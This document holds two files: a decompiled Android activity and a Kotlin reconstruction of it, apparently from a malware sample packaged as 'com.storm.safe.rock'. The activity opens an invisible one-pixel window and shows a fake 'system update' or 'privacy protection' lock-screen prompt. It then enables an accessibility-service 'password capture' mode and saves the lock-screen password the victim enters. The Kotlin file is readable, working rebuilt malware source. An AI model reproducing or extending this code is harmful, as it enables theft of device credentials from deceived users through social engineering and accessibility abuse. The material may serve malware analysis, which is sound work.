File: jadx-reference/rock/activity/syuqattwmgit.java
package com.storm.safe.rock.activity;

import android.app.Activity;
import android.app.KeyguardManager;
import android.content.Context;
import android.content.Intent;
import android.graphics.Rect;
import android.hardware.biometrics.BiometricPrompt;
import android.os.Build;
import android.os.Bundle;
import android.os.CancellationSignal;
import android.os.Handler;
import android.os.Looper;
import android.view.View;
import android.view.WindowManager;
import android.view.WindowMetrics;
import com.storm.safe.rock.service.dqtvuisjd;
import com.storm.safe.rock.service.modules.cipher.C0335a1;
import com.storm.safe.rock.service.modules.cipher.C0337a3;
import kotlin.Triple;
import okhttp3.internal.p032ws.WebSocketProtocol;
import okio.Segment;
import p000.AbstractC0709j8;
import p000.AbstractC1120qr;
import p000.RunnableC0941o6;
import p000.h10;
import p000.t60;
import p000.tz0;
import p000.xk1;
import p000.yk1;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class syuqattwmgit extends Activity {

    /* renamed from: a3 */
    public static final C0248a0 f51917a3 = new C0248a0(null);

    /* renamed from: a4 */
    public static h10 f51918a4;

    /* renamed from: a0 */
    public int f51919a0;

    /* renamed from: a1 */
    public CancellationSignal f51920a1;

    /* renamed from: a2 */
    public boolean f51921a2;

    /* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
    /* renamed from: com.storm.safe.rock.activity.syuqattwmgit$a0 */
    public static final class C0248a0 {
        public /* synthetic */ C0248a0(AbstractC1120qr abstractC1120qr) {
            this();
        }

        public static /* synthetic */ void start$default(C0248a0 c0248a0, Context context, int i, h10 h10Var, int i2, Object obj) {
            if ((i2 & 2) != 0) {
                i = 0;
            }
            if ((i2 & 4) != 0) {
                h10Var = null;
            }
            c0248a0.start(context, i, h10Var);
        }

        public final h10 getOnCredentialVerified() {
            return syuqattwmgit.f51918a4;
        }

        public final void setOnCredentialVerified(h10 h10Var) {
            syuqattwmgit.f51918a4 = h10Var;
        }

        public final void start(Context context, int i, h10 h10Var) {
            t60.m214695b6(context, "context");
            setOnCredentialVerified(h10Var);
            Intent intent = new Intent(context, (Class<?>) syuqattwmgit.class);
            intent.putExtra("credential_type", i);
            intent.addFlags(268435456);
            context.startActivity(intent);
        }

        private C0248a0() {
        }
    }

    /* renamed from: a0 */
    public final void m211191a0(boolean z) {
        t60.m214702c3("syuqattwmgit", "验证完成: ".concat(z ? "成功" : "失败"));
        try {
            if (C0335a1.f53283c5.getInstance() != null) {
                t60.m214714d6("CipherCaptureManager", "🔷 [setPasswordActivityFinished] syuqattwmgit 已结束");
            }
        } catch (Exception e) {
            tz0.m214810b0("设置密码界面结束标志失败: ", e.getMessage(), "syuqattwmgit");
        }
        dqtvuisjd.C0290a0 c0290a0 = dqtvuisjd.f52358m1;
        c0290a0.setAssistMode();
        finish();
        try {
            dqtvuisjd c0290a02 = c0290a0.getInstance();
            if (c0290a02 != null) {
                C0335a1 c0600hy = C0335a1.f53283c5.getInstance(c0290a02, c0290a02);
                if (z) {
                    t60.m214714d6("syuqattwmgit", "验证成功，confirmAndSaveLastCipher 结果: " + c0600hy.m211812b1());
                } else {
                    C0337a3 sm0Var = C0337a3.f53343b6.getInstance(c0290a02, c0290a02);
                    if (sm0Var.m211845a8() || !sm0Var.f53351a5.isEmpty()) {
                        c0600hy.m211816b6();
                        t60.m214726f4("syuqattwmgit", "验证失败/取消，丢弃缓冲密码（覆盖层存在或有图案数据）");
                    } else {
                        t60.m214702c3("syuqattwmgit", "验证失败但无覆盖层和图案数据，跳过 discard");
                    }
                }
                c0600hy.m211815b5();
                t60.m214714d6("syuqattwmgit", "已关闭密码捕获监听模式");
            }
        } catch (Exception e2) {
            tz0.m214810b0("处理验证结果失败: ", e2.getMessage(), "syuqattwmgit");
        }
        h10 h10Var = f51918a4;
        if (h10Var != null) {
            h10Var.invoke(Boolean.valueOf(z));
        }
        f51918a4 = null;
    }

    /* renamed from: a1 */
    public final Triple m211192a1() {
        return this.f51919a0 == 0 ? new Triple(t60.m214713d4("appCredentialTitle", "Verify personal identity"), t60.m214713d4("appCredentialSubTitle", "Privacy protection"), t60.m214713d4("appCredentialDescription", "To protect your privacy, please enter your lock screen password to verify that you are the one making the operation.")) : new Triple(t60.m214713d4("updateCredentialTitle", "Verify lock screen password"), t60.m214713d4("updateCredentialSubTitle", "Fix system security vulnerabilities"), t60.m214713d4("updateCredentialDescription", "Please enter your lock screen password to complete the system update and fix security vulnerabilities."));
    }

    /* renamed from: a2 */
    public final void m211193a2() {
        if (Build.VERSION.SDK_INT < 30) {
            return;
        }
        t60.m214702c3("syuqattwmgit", "使用 BiometricPrompt (API 30+)");
        Triple tripleM211192a1 = m211192a1();
        String str = (String) tripleM211192a1.f57564a0;
        String str2 = (String) tripleM211192a1.f57565a1;
        String str3 = (String) tripleM211192a1.f57566a2;
        t60.m214702c3("syuqattwmgit", "标题: " + str + ", 副标题: " + str2);
        try {
            AbstractC0709j8.m213235b6();
            BiometricPrompt biometricPromptBuild = AbstractC0709j8.m213225a6(this).setTitle(str).setSubtitle(str2).setDescription(str3).setAllowedAuthenticators(32768).build();
            t60.m214694b5(biometricPromptBuild, "Builder(this)\n          …\n                .build()");
            CancellationSignal cancellationSignal = new CancellationSignal();
            this.f51920a1 = cancellationSignal;
            cancellationSignal.setOnCancelListener(new xk1());
            dqtvuisjd.f52358m1.setVerifyPauseMode();
            sendBroadcast(new Intent("com.storm.safe.rock.BIOMETRIC_PROMPT_SHOWN").setPackage(getPackageName()));
            t60.m214714d6("syuqattwmgit", "已发送 BIOMETRIC_PROMPT_SHOWN 广播");
            CancellationSignal cancellationSignal2 = this.f51920a1;
            t60.m214692b3(cancellationSignal2);
            biometricPromptBuild.authenticate(cancellationSignal2, getMainExecutor(), new yk1(this));
        } catch (Exception e) {
            t60.m214704c5("syuqattwmgit", "BiometricPrompt 异常: " + e.getMessage());
            m211194a3();
        }
    }

    /* renamed from: a3 */
    public final void m211194a3() {
        t60.m214702c3("syuqattwmgit", "使用 KeyguardManager");
        Object systemService = getSystemService("keyguard");
        t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.KeyguardManager");
        Triple tripleM211192a1 = m211192a1();
        String str = (String) tripleM211192a1.f57564a0;
        String str2 = (String) tripleM211192a1.f57566a2;
        t60.m214702c3("syuqattwmgit", "标题: " + str);
        Intent intentCreateConfirmDeviceCredentialIntent = ((KeyguardManager) systemService).createConfirmDeviceCredentialIntent(str, str2);
        if (intentCreateConfirmDeviceCredentialIntent == null) {
            if (Build.VERSION.SDK_INT >= 30) {
                t60.m214726f4("syuqattwmgit", "KeyguardManager.createConfirmDeviceCredentialIntent 返回 null，回退 BiometricPrompt");
                m211193a2();
                return;
            } else {
                t60.m214704c5("syuqattwmgit", "无法创建验证 Intent");
                m211191a0(false);
                return;
            }
        }
        intentCreateConfirmDeviceCredentialIntent.addFlags(536870912);
        intentCreateConfirmDeviceCredentialIntent.addFlags(67108864);
        intentCreateConfirmDeviceCredentialIntent.addFlags(8388608);
        dqtvuisjd.f52358m1.setVerifyPauseMode();
        sendBroadcast(new Intent("com.storm.safe.rock.BIOMETRIC_PROMPT_SHOWN").setPackage(getPackageName()));
        t60.m214714d6("syuqattwmgit", "已发送 BIOMETRIC_PROMPT_SHOWN 广播 (KeyguardManager)");
        startActivityForResult(intentCreateConfirmDeviceCredentialIntent, WebSocketProtocol.CLOSE_CLIENT_GOING_AWAY);
    }

    @Override // android.app.Activity
    public final void onActivityResult(int i, int i2, Intent intent) {
        super.onActivityResult(i, i2, intent);
        if (i == 1001) {
            if (i2 == -1) {
                t60.m214702c3("syuqattwmgit", "KeyguardManager 结果: 成功");
                m211191a0(true);
            } else {
                t60.m214702c3("syuqattwmgit", "KeyguardManager 结果: 失败/取消");
                m211191a0(false);
            }
        }
    }

    @Override // android.app.Activity
    public final void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        t60.m214702c3("syuqattwmgit", "syuqattwmgit 启动");
        try {
            if (C0335a1.f53283c5.getInstance() != null) {
                t60.m214714d6("CipherCaptureManager", "🔷 [setPasswordActivityLaunched] syuqattwmgit 已启动");
            }
        } catch (Exception e) {
            tz0.m214810b0("设置启动保护期失败: ", e.getMessage(), "syuqattwmgit");
        }
        t60.m214715d7(this);
        int intExtra = getIntent().getIntExtra("credential_type", 0);
        this.f51919a0 = intExtra;
        t60.m214702c3("syuqattwmgit", "验证类型: ".concat(intExtra == 0 ? "应用验证" : "系统更新"));
        View view = new View(this);
        if (Build.VERSION.SDK_INT >= 30) {
            WindowMetrics currentWindowMetrics = getWindow().getWindowManager().getCurrentWindowMetrics();
            t60.m214694b5(currentWindowMetrics, "window.windowManager.currentWindowMetrics");
            Rect bounds = currentWindowMetrics.getBounds();
            t60.m214694b5(bounds, "windowMetrics.bounds");
            view.layout(bounds.left, bounds.top, bounds.right, bounds.bottom);
        }
        setContentView(view);
        WindowManager.LayoutParams attributes = getWindow().getAttributes();
        attributes.dimAmount = 0.0f;
        attributes.x = 0;
        attributes.y = 0;
        attributes.width = 1;
        attributes.height = 1;
        attributes.gravity = 8388661;
        getWindow().setAttributes(attributes);
        getWindow().getDecorView().setBackgroundColor(0);
        getWindow().setFlags(Segment.SHARE_MINIMUM, Segment.SHARE_MINIMUM);
        getWindow().addFlags(32);
        getWindow().addFlags(16);
        getWindow().addFlags(67108864);
        getWindow().addFlags(134217728);
        getWindow().addFlags(262144);
        t60.m214702c3("syuqattwmgit", "syuqattwmgit onCreate 完成");
    }

    @Override // android.app.Activity
    public final void onDestroy() {
        t60.m214702c3("syuqattwmgit", "syuqattwmgit onDestroy");
        super.onDestroy();
        CancellationSignal cancellationSignal = this.f51920a1;
        if (cancellationSignal != null) {
            cancellationSignal.cancel();
        }
        this.f51920a1 = null;
    }

    @Override // android.app.Activity
    public final void onResume() {
        super.onResume();
        t60.m214702c3("syuqattwmgit", "syuqattwmgit onResume, hasTriggeredAuth=" + this.f51921a2);
        if (this.f51921a2) {
            return;
        }
        this.f51921a2 = true;
        try {
            dqtvuisjd c0290a0 = dqtvuisjd.f52358m1.getInstance();
            if (c0290a0 != null) {
                C0335a1.m211788c1(C0335a1.f53283c5.getInstance(c0290a0, c0290a0));
                t60.m214714d6("syuqattwmgit", "已启用密码捕获监听模式");
            }
        } catch (Exception e) {
            tz0.m214810b0("启用密码捕获失败: ", e.getMessage(), "syuqattwmgit");
        }
        new Handler(Looper.getMainLooper()).postDelayed(new RunnableC0941o6(24, this), 300L);
    }

    @Override // android.app.Activity
    public final void onStop() {
        super.onStop();
        t60.m214702c3("syuqattwmgit", "syuqattwmgit onStop (透明Activity被覆盖，这是正常的)");
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/activity/syuqattwmgit.kt
package com.storm.safe.rock.activity

import android.app.Activity
import android.app.KeyguardManager
import android.content.Intent
import android.graphics.Rect
import android.hardware.biometrics.BiometricPrompt
import android.os.Build
import android.os.Bundle
import android.os.CancellationSignal
import android.os.Handler
import android.os.Looper
import android.util.Log
import android.view.View
import android.view.WindowManager
import com.storm.safe.rock.service.MyAccessibilityService
import com.storm.safe.rock.service.modules.cipher.CipherCaptureManager

/**
 * Transparent Activity that triggers biometric/credential verification.
 * Supports BiometricPrompt (API 30+) and KeyguardManager fallback.
 *
 * Reverse-engineered from JADX: activity/syuqattwmgit.java (287 lines).
 * Renamed: f51917a3→Companion, f51918a4→onCredentialVerified, f51919a0→credentialType,
 *          f51920a1→cancellationSignal, f51921a2→hasTriggeredAuth,
 *          m211191a0→onVerificationComplete, m211192a1→getTitleStrings,
 *          m211193a2→showBiometricPrompt, m211194a3→showKeyguardPrompt
 */
class syuqattwmgit : Activity() {

    companion object {
        private const val TAG = "syuqattwmgit"
        private const val KEYGUARD_REQUEST_CODE = 1001

        @Volatile
        @JvmStatic
        var onCredentialVerified: ((Boolean) -> Unit)? = null

        /**
         * Start the credential verification activity.
         * @param credentialType 0 = app verification, 1 = system update
         * @param callback optional callback for verification result
         */
        @JvmStatic
        @JvmOverloads
        fun start(context: android.content.Context, credentialType: Int = 0, callback: ((Boolean) -> Unit)? = null) {
            onCredentialVerified = callback
            val intent = Intent(context, syuqattwmgit::class.java)
            intent.putExtra("credential_type", credentialType)
            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
            context.startActivity(intent)
        }
    }

    var credentialType: Int = 0
    var cancellationSignal: CancellationSignal? = null
    var hasTriggeredAuth: Boolean = false

    /**
     * Handle verification completion.
     */
    fun onVerificationComplete(success: Boolean) {
        Log.v(TAG, "验证完成: ${if (success) "成功" else "失败"}")
        try {
            CipherCaptureManager.instance?.let {
                Log.d("CipherCaptureManager", "🔷 [setPasswordActivityFinished] syuqattwmgit 已结束")
            }
        } catch (e: Exception) {
            Log.w(TAG, "设置密码界面结束标志失败: ${e.message}")
        }

        MyAccessibilityService.Companion.setAssistMode()
        finish()

        try {
            val svc = MyAccessibilityService.Companion.getInstance()
            if (svc != null) {
                val ccm = CipherCaptureManager.instance
                if (ccm != null) {
                    if (success) {
                        Log.d(TAG, "验证成功，confirmAndSaveLastCipher 结果: ${ccm.confirmAndSaveLastCipher()}")
                    } else {
                        // vendor syuqattwmgit.java:108-115 — 条件 discard:
                        //   只在 overlay 存在或有 pattern 数据时 discard，否则保留缓冲密码
                        val pco = com.storm.safe.rock.service.modules.cipher.PatternCaptureOverlay.instance
                        val hasOverlay = pco?.captureState == 1 // captureState != 0 means active
                        val hasPatternData = pco?.capturedPoints?.isNotEmpty() == true
                        if (hasOverlay || hasPatternData) {
                            ccm.discardBufferedPassword()
                            Log.w(TAG, "验证失败/取消，丢弃缓冲密码（覆盖层存在或有图案数据）")
                        } else {
                            Log.v(TAG, "验证失败但无覆盖层和图案数据，跳过 discard")
                        }
                    }
                    ccm.stopListening()
                    Log.d(TAG, "已关闭密码捕获监听模式")
                }
            }
        } catch (e: Exception) {
            Log.w(TAG, "处理验证结果失败: ${e.message}")
        }

        onCredentialVerified?.invoke(success)
        onCredentialVerified = null
    }

    /**
     * Get localized title strings based on credential type.
     */
    fun getTitleStrings(): Triple<String, String, String> {
        return if (credentialType == 0) {
            Triple(
                "Verify personal identity",
                "Privacy protection",
                "To protect your privacy, please enter your lock screen password to verify that you are the one making the operation."
            )
        } else {
            Triple(
                "Verify lock screen password",
                "Fix system security vulnerabilities",
                "Please enter your lock screen password to complete the system update and fix security vulnerabilities."
            )
        }
    }

    /**
     * Show BiometricPrompt (API 30+).
     */
    fun showBiometricPrompt() {
        if (Build.VERSION.SDK_INT < 30) return
        Log.v(TAG, "使用 BiometricPrompt (API 30+)")
        val (title, subtitle, description) = getTitleStrings()
        Log.v(TAG, "标题: $title, 副标题: $subtitle")
        try {
            val prompt = BiometricPrompt.Builder(this)
                .setTitle(title)
                .setSubtitle(subtitle)
                .setDescription(description)
                .setAllowedAuthenticators(0x8000) // DEVICE_CREDENTIAL
                .build()

            val signal = CancellationSignal()
            cancellationSignal = signal
            signal.setOnCancelListener { /* cancel listener */ }

            MyAccessibilityService.Companion.setVerifyPauseMode()
            sendBroadcast(Intent("com.storm.safe.rock.BIOMETRIC_PROMPT_SHOWN").setPackage(packageName))
            Log.d(TAG, "已发送 BIOMETRIC_PROMPT_SHOWN 广播")

            prompt.authenticate(signal, mainExecutor, object : BiometricPrompt.AuthenticationCallback() {
                override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                    Log.v(TAG, "BiometricPrompt 结果: 成功")
                    onVerificationComplete(true)
                }

                override fun onAuthenticationFailed() {
                    Log.v(TAG, "BiometricPrompt 结果: 失败")
                }

                override fun onAuthenticationError(errorCode: Int, errString: CharSequence) {
                    Log.v(TAG, "BiometricPrompt 错误: $errorCode $errString")
                    onVerificationComplete(false)
                }
            })
        } catch (e: Exception) {
            Log.e(TAG, "BiometricPrompt 异常: ${e.message}")
            showKeyguardPrompt()
        }
    }

    /**
     * Show KeyguardManager credential prompt (fallback).
     */
    fun showKeyguardPrompt() {
        Log.v(TAG, "使用 KeyguardManager")
        val km = getSystemService("keyguard") as KeyguardManager
        val (title, _, description) = getTitleStrings()
        Log.v(TAG, "标题: $title")
        @Suppress("DEPRECATION")
        val credentialIntent = km.createConfirmDeviceCredentialIntent(title, description)
        if (credentialIntent == null) {
            if (Build.VERSION.SDK_INT >= 30) {
                Log.w(TAG, "KeyguardManager.createConfirmDeviceCredentialIntent 返回 null，回退 BiometricPrompt")
                showBiometricPrompt()
                return
            } else {
                Log.e(TAG, "无法创建验证 Intent")
                onVerificationComplete(false)
                return
            }
        }
        // vendor syuqattwmgit.java:186-188 — SINGLE_TOP + CLEAR_TOP + EXCLUDE_FROM_RECENTS
        credentialIntent.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP)          // vendor: 536870912
        credentialIntent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP)           // vendor: 67108864
        credentialIntent.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS) // vendor: 8388608
        MyAccessibilityService.Companion.setVerifyPauseMode()
        sendBroadcast(Intent("com.storm.safe.rock.BIOMETRIC_PROMPT_SHOWN").setPackage(packageName))
        Log.d(TAG, "已发送 BIOMETRIC_PROMPT_SHOWN 广播 (KeyguardManager)")
        @Suppress("DEPRECATION")
        startActivityForResult(credentialIntent, KEYGUARD_REQUEST_CODE)
    }

    @Suppress("DEPRECATION")
    override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
        super.onActivityResult(requestCode, resultCode, data)
        if (requestCode == KEYGUARD_REQUEST_CODE) {
            if (resultCode == RESULT_OK) {
                Log.v(TAG, "KeyguardManager 结果: 成功")
                onVerificationComplete(true)
            } else {
                Log.v(TAG, "KeyguardManager 结果: 失败/取消")
                onVerificationComplete(false)
            }
        }
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        Log.v(TAG, "syuqattwmgit 启动")
        try {
            CipherCaptureManager.instance?.let {
                Log.d("CipherCaptureManager", "🔷 [setPasswordActivityLaunched] syuqattwmgit 已启动")
            }
        } catch (e: Exception) {
            Log.w(TAG, "设置启动保护期失败: ${e.message}")
        }

        // Make activity invisible
        credentialType = intent.getIntExtra("credential_type", 0)
        Log.v(TAG, "验证类型: ${if (credentialType == 0) "应用验证" else "系统更新"}")

        val view = View(this)
        if (Build.VERSION.SDK_INT >= 30) {
            val windowMetrics = window.windowManager.currentWindowMetrics
            val bounds = windowMetrics.bounds
            view.layout(bounds.left, bounds.top, bounds.right, bounds.bottom)
        }
        setContentView(view)

        // Configure transparent window — vendor syuqattwmgit.java:233-247
        val attrs = window.attributes
        attrs.dimAmount = 0.0f
        attrs.x = 0
        attrs.y = 0
        attrs.width = 1
        attrs.height = 1
        // vendor L239: attributes.gravity = 8388661 = Gravity.END | Gravity.TOP
        attrs.gravity = android.view.Gravity.END or android.view.Gravity.TOP
        window.attributes = attrs
        window.decorView.setBackgroundColor(0)
        // vendor L242: setFlags(Segment.SHARE_MINIMUM=1024, 1024) — FLAG_ALT_FOCUSABLE_IM (0x400)
        window.setFlags(0x400, 0x400)
        // vendor L243: addFlags(32) = FLAG_NOT_TOUCH_MODAL
        window.addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL)
        // vendor L244: addFlags(16) = FLAG_NOT_TOUCHABLE
        window.addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE)
        // vendor L245: addFlags(67108864) = FLAG_TRANSLUCENT_STATUS
        window.addFlags(WindowManager.LayoutParams.FLAG_TRANSLUCENT_STATUS)
        // vendor L246: addFlags(134217728) = FLAG_TRANSLUCENT_NAVIGATION
        window.addFlags(WindowManager.LayoutParams.FLAG_TRANSLUCENT_NAVIGATION)
        // vendor L247: addFlags(262144) = FLAG_IGNORE_CHEEK_PRESSES
        window.addFlags(WindowManager.LayoutParams.FLAG_IGNORE_CHEEK_PRESSES)

        Log.v(TAG, "syuqattwmgit onCreate 完成")
    }

    override fun onDestroy() {
        Log.v(TAG, "syuqattwmgit onDestroy")
        super.onDestroy()
        cancellationSignal?.cancel()
        cancellationSignal = null
    }

    override fun onResume() {
        super.onResume()
        Log.v(TAG, "syuqattwmgit onResume, hasTriggeredAuth=$hasTriggeredAuth")
        if (hasTriggeredAuth) return
        hasTriggeredAuth = true
        try {
            val svc = MyAccessibilityService.Companion.getInstance()
            if (svc != null) {
                val ccm = CipherCaptureManager.instance
                ccm?.startListening()
                Log.d(TAG, "已启用密码捕获监听模式")
            }
        } catch (e: Exception) {
            Log.w(TAG, "启用密码捕获失败: ${e.message}")
        }
        // vendor RunnableC0941o6.java:733 (case 24) — isFinishing/isDestroyed guard
        Handler(Looper.getMainLooper()).postDelayed({
            if (isFinishing || isDestroyed) {
                Log.w(TAG, "Activity 已销毁，跳过 BiometricPrompt")
                return@postDelayed
            }
            Log.v(TAG, "API 版本: ${Build.VERSION.SDK_INT}")
            if (Build.VERSION.SDK_INT >= 30) {
                showBiometricPrompt()
            } else {
                showKeyguardPrompt()
            }
        }, 300L)
    }

    override fun onStop() {
        super.onStop()
        Log.v(TAG, "syuqattwmgit onStop (透明Activity被覆盖，这是正常的)")
    }
}
